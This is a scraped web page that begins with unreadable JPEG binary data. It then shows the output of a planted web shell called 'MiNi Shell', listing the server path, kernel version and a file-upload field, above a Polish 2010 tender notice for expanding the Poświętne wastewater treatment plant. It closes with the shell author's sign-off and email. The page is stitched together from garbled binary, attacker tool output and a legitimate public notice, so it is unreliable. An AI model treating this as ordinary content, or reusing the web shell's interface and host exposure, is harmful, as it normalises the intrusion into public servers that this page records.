JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100420/111634-N-2010.html

<p class="kh_header"><b>Poświętne: Rozbudowa i przebudowa oczyszczalni ścieków w Poświętnem.</b><br>
<b>Numer ogłoszenia: 111634 - 2010; data zamieszczenia: 20.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Poświętne , ul. Akacjowa 4, 26-315 Poświętne, woj. łódzkie, tel. 044 7564034, faks 044 7564034.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.poswietne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i przebudowa oczyszczalni ścieków w Poświętnem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu Projektu 
pn.  Rozbudowa i przebudowa oczyszczalni  ścieków w Poświętnem
ul. Szkolna 1, na działkach o nr ewidencyjnych : 684, 685, 686, 687, 688, 689, 387 
i 338/2, obręb Poświętne.
Celem wykonania zamówienia jest zwiększenie przepustowości istniejącej 
oczyszczalni ścieków o przepustowości 35 m3/dobę do przepustowości 150 m3/dobę
 Projekt zakłada wykonanie oczyszczalni ścieków mechaniczno-biologicznej 
działającej w oparciu o nitryfikująco-denitryfikujący osad czynny z tlenową 

Elementy składowe oczyszczalni :
Bioreaktor - konstrukcji żelbetowej wylewanej. Przekrój cylindryczny 
o średnicy zewnętrznej reaktora 10,75 m i średnicy wewnętrznej 10,25 m
oraz o wysokości konstrukcyjnej ściany 5,50 m. Grubość ścian płaszcza - 
25 cm. 
Płyta denna bioreaktora średnicy 11,05 m i grubości 35 cm z betonu 
konstrukcyjnego szczelnego klasy C 30/37 (B37).
3.2.2. Budynek techniczny - wolnostojący, niepodpiwniczony, parterowy
o wymiarach zewnętrznych 9,24 x 8,24 m, przykryty dachem dwuspadowym 
 z naczółkiem.
 Dane techniczne :
 - powierzchnia zabudowy - 78,96 m2
 - powierzchnia użytkowa - 64,61 + antresola 40,81 m2
- kubatura - 349,0 m3
3.2.3. Zbiorniki osadu - okrągły, jednokomorowy zbiornik z prefabrykowanych 
kręgów żelbetowych, wykonanych z betonu szczelnego C30/37, klasy 
ekspozycji XD2, zbrojonych stalą AIII-34GS. Przykryty prefabrykowaną
płytą żelbetową z włazem kanałowym O 800 mm z kominkiem 
wentylacyjnym.
Średnica wewnętrzna    - 3,00 m
Wysokość w świetle -      3,65 m
Powierzchnia zabudowy - 9,62 m2
Kubatura -                        35,11 m3
Rzędna spodu płyty -      158,70 m n.p.m.
Pompownia ścieków surowych - okrągły, jednokomorowy zbiornik 
o średnicy wew. 2,00 m i wysokości w świetle 4,50 m
z prefabrykowanych kręgów żelbetowych z betonu szczelnego C30/37, 
przykryty płytą żelbetową z włazem i otworem na kosz do skratek 80x50 
cm, zamontowany na żelbetowej płycie dennej o średnicy 2,70 m i gr. 30cm. 
                         
Powierzchnia zabudowy - 4,52 m2
Kubatura -                         20,34 m3
 Rzędna spodu płyty -       156,45 m n.p.m.
Zbiornik uśredniający ścieków dowożonych - dwa częściowo 
zagłębione w ziemi, okrągłe jednokomorowe zbiorniki z prefabrykowanych 
kręgów żelbetowych wykonanych z betonu szczelnego C30/37, klasa 
ekspozycji XD2, zbrojonych stalą AIII-34 GS, przykrytych prefabrykowaną
płytą żelbetową
Średnica wewnętrzna -  3,00 m
Wysokość w świetle  -  4,00 m
Powierzchnia zabudowy - 19,24 m2
Kubatura -                          77,00
Rzędna spodu płyty -        156,95 m n.p.m.
-Studnia pomiarowa -podziemny, okrągły, jednokomorowy 
zbiornik z prefabrykowanych kręgów żelbetowych o parametrach :
Średnica wewnętrzna -   1,60 m
Wysokość w świetle -    2,00 m
Powierzchnia zabudowa - 3,14 m2
Kubatura - 6,28 m3 
Rzędna spodu płyty - 158,95 m n.p.m.
Taca najazdowa stacji zlewczej ścieków - W ciągu drogi wewnętrznej
przy punkcie zlewnym do obierania nieczystości  z wozów
asenizacyjnych planuje się wykonać prostokątna tacę najazdową o pow. 
zabudowy - 26,72 m2.
Stacja zlewcza - obiekt o wymiarach 2,05 x 2,05(licząc bez 
ocieplenia) i wysokości 2,5 m, przykryty dachem jednospadowym, 
konstrukcji murowanej.
-Agregat prądotwórczy na płycie zbrojonej o wym. 2,60 x 1,60 i gr. 
40 cm w osłonie termo i dźwiękochłonnej jako komplet.
- Hydrbotaniczny  stopień oczyszczania ścieków- uszczelniony 
zbiornik ziemny za pomocą geomembrany, z drenażem rozsączającym 
i posadzoną roślinnością.
-Instalacje sanitarne międzyobiektowe :
- kolektor grawitacyjny PVC O 160 mm, l=72,40 m
-kolektor grawitacyjny PVC O 200 mm, l=93,80 m
- kolektor grawitacyjny PVC O 315 mm, l=14,00 m
- drenaż rozsączający PVC-U O 160 mm, l=55,50 m
- drenaż zbierający PVC O mm, l=54,30 m
- kolektor tłoczny 2 x PE O 90 mm, l=39,40 m
- kolektor tłoczny PE O 90 mm, l=14,40 m
- Przyłącze wodociągowe O 80 mm, l=32,50 m
- Drogi i ogrodzenie
- Drogi wewnętrzne z kostki brukowej kolanowej gr 8 cm na 
podbudowie wg projektu o pow. 742,8 m2
- Ogrodzenie dł. 207 m z siatki 1,5 m wysokości, na słupach stalowych
z bramą otwieraną bez napędu.
-Automatyka, zasilanie i sterowanie
- zasilanie podstawowe i awaryjne
- instalacje elektryczne
Urządzenia technologiczne i wyposażenie a także sprzęt 
bhp i ppoż.
Rozruch technologiczny oczyszczalni ścieków 
UWAGA! Zamawiający dopuszcza możliwość złożenia ofert równoważnych w zakresie zaproponowanych materiałów i urządzeń wskazanych w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót oraz w przedmiarach robót. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określonych w dokumentacji projektowej. Parametry równoważności dla zaprojektowanego systemu technologicznego oczyszczalni ścieków zostały określone w tomie II, rozdziale 5 Projektu Technologicznego.  W sytuacji, gdy wykonawca zamierza zastosować inne materiały i urządzenia niż podane w dokumentacji projektowej (materiały i urządzenia równoważne) winien dołączyć do oferty wykaz zawierający materiały i urządzenia zawarte w dokumentacji projektowej oraz podać ich równoważniki (nazwy materiałów i urządzeń zaproponowanych w ofercie). Do wykazu wówczas należy dołączyć stosowne dokumenty zawierające parametry techniczne i jakościowe zaproponowanych równoważnych materiałów i urządzeń.
        
 Szczegółowy  opis przedmiotu zamówienia zawierają załączniki do SIWZ:
        Załącznik nr 1 - Specyfikacje techniczne wykonania i odbioru robót budowlanych
        Załącznik nr 2 - Dokumentacja projektowa
       Załącznik nr 3 -  Przedmiar robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9, 45.23.22.00-4, 45.25.22.00-0, 45.22.30.00-6, 45.31.43.00-4, 45.31.51.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 30.000,00 zł.
Wadium wnoszone w pieniądzu należy wpłacać na konto 54 8985 0004 0030 0306 6976 0001 PBS Tomaszów Maz.
Wadium wnosi się przed upływem terminu składania ofert.
Potwierdzenie wniesienia wadium dołącza się do ofert.
Wykonawca wnosi wadium w formach określonych w art. 45 ust.6
Zwrot wadium nastąpi zgodnie z art. 46 Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna wykonanie przez Wykonawcę w ciągu ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch zamówień polegających na budowie, przebudowie, rozbudowie oczyszczalni ścieków o przepustowości nie mniejszej niż Qdśr=150m3/d wraz z wykonaniem: obiektów towarzyszących, sieci uzbrojenia terenu i zagospodarowania terenu (drogi, place, zieleń, ogrodzenie). Zamawiający dokona oceny spełniania warunku na podstawie załączonych do oferty dokumentów i oświadczeń metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku zamawiający uzna udokumentowanie dysponowania co najmniej 4 osobami posiadającymi doświadczenie w kierowaniu robotami budowlanymi w branży : ogólnobudowlanej, elektrycznej, sanitarnej i ochrony środowiska, tj.
1 osoba -  kierownik budowy - posiadający doświadczenie zawodowe na                 
stanowisku kierownika budowy, w tym przy realizacji, co najmniej jednego 
kontraktu/zadania dotyczącego budowy/przebudowy oczyszczalni ścieków 
o przepustowości min. Ośr.d = 150 m3/dobę, posiadający uprawnienia budowlane do 
kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-
 budowlanej  lub odpowiadające im ważne uprawnienia budowlane, które zostały 
wydane na podstawie wcześniej obowiązujących przepisów.
            1 osoba - kierownik robót sanitarnych - posiadający doświadczenie zawodowe na  stanowisku kierownika budowy lub  robót sanitarnych, w tym przy realizacji, co najmniej jednego kontraktu/zadania dotyczącego budowy/przebudowy oczyszczalni ścieków o przepustowości min. Ośr.d= 150 m3/dobę, kanalizacji sanitarnej i sieci wodociągowej, posiadający uprawnienia instalacyjno-inżynieryjne w zakresie ochrony środowiska, które uprawniają do kierowania, nadzorowania i kontrolowania budowy i robót, w  zakresie  sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
        1 osoba - kierownik robót elektrycznych - posiadający doświadczenie  
zawodowe na stanowisku kierownika budowy lub robót elektrycznych, w tym przy realizacji co najmniej jednego kontraktu/zadania dotyczącego budowy /przebudowy oczyszczalni ścieków o przepustowości min. Ośr.d = 150m3/dobę, posiadający uprawnienia 
budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
        1 osoba - kierownik robót konstrukcyjno - budowlanych posiadający doświadczenie zawodowe na stanowisku kierownika budowy lub robót konstrukcyjno - budowlanych, w tym przy realizacji co najmniej jednego kontraktu/zadania dotyczącego budowy/przebudowy oczyszczalni ścieków o przepustowości min. Ośr.d = 150 m3/dobę, posiadający uprawnienia 
budowlane do kierowania robotami budowlanymi w specjalności  konstrukcyjno - budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.

Zamawiający dopuszcza łączenie  funkcji kierowniczych, pod warunkiem, że spełnią wszystkie wymagane warunki dla poszczególnych branż.
Zamawiający dokona oceny spełniania warunku na podstawie załączonych do oferty dokumentów i oświadczeń metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku określonego zamawiający uzna udokumentowanie posiadania : - ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości nie mniejszej niż 2 000 000,00 zł. - środków finansowych lub zdolności kredytowej w wysokości co najmniej 2 000 000,00 zł. Zamawiający dokona oceny spełniania warunku na podstawie załączonych do oferty dokumentów i oświadczeń metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Parafowany projekt umowy Harmonogram rzeczowo finansowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się wprowadzanie zmian polegających na : a) zmianie nazwy firmy, danych adresowych lub osób uprawnionych do podpisania umowy, jeżeli zmiany nastąpiły po zawarciu umowy, b) wpisaniu lub zmianie numeru konta bankowego, c) zmianie osób pełniących funkcje nadzoru na budowie. d) zmianie stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, a w ślad za tym zmiany wynagrodzenia określonego w § 5 ust. 1, e) zmianie terminu realizacji przedmiotu zamówienia, w przypadku: - gdy nie wykonanie zamówienia w terminie wynika z winy zamawiającego - wystąpienia zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy i mającej wpływ na zakres lub termin wykonania przedmiotu zamówienia, - działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie; - przerwy w wykonywaniu robót budowlanych spowodowanej wyjątkowo niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót zgodnie ze specyfikacją techniczną wykonania i odbioru robót. Fakt ten musi być potwierdzony pisemnie przez Zamawiającego; - błędów w dokumentacji projektowej, w oparciu o którą wykonywane jest zamówienie i konieczności naniesienia przez projektanta poprawek lub zmian w projekcie, które mają wpływ na termin realizacji zamówienia; - realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, - jeżeli zostaną ujawnione elementy infrastruktury podziemnej, dotychczas niezinwentaryzowanej w zasobach Zamawiającego, będące przyczyną kolizji, których usunięcie będzie powodowało prace dotychczas nieprzewidziane, - złożenia przez wykonawcę propozycji, które przyśpieszą ukończenie robót, zmniejszając koszty, poprawią sprawność lub jakość robót lub w inny sposób dostarczą zamawiającemu pożytku, f) jeżeli wprowadzone zmiany będą korzystne dla Zamawiającego g) w zakresie zmiany kierownika budowy, w sytuacji gdy osoba wymieniona w ofercie Wykonawcy z przyczyn niezależnych od niego nie będzie mogła pełnić funkcji, pod warunkiem, ze osoba wskazana przez Wykonawcę będzie posiadała odpowiednie uprawnienia stosowne do wymagań SIWZ Wszelkie zmiany i uzupełnienia treści umowy wymagają zgody obu stron i aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.poswietne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Poświętne ul. Akacjowa 4 26-315 Poświętne pokój nr 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 11:00, miejsce: Urząd Gminy w Poświętnem, ul. Akacjowa 4, 26-315 Poświętne, pokój nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest finansowany ze środków Unii Europejskiej, Program Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania 313, 322, 323 --Odnowa i rozwój wsi--..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com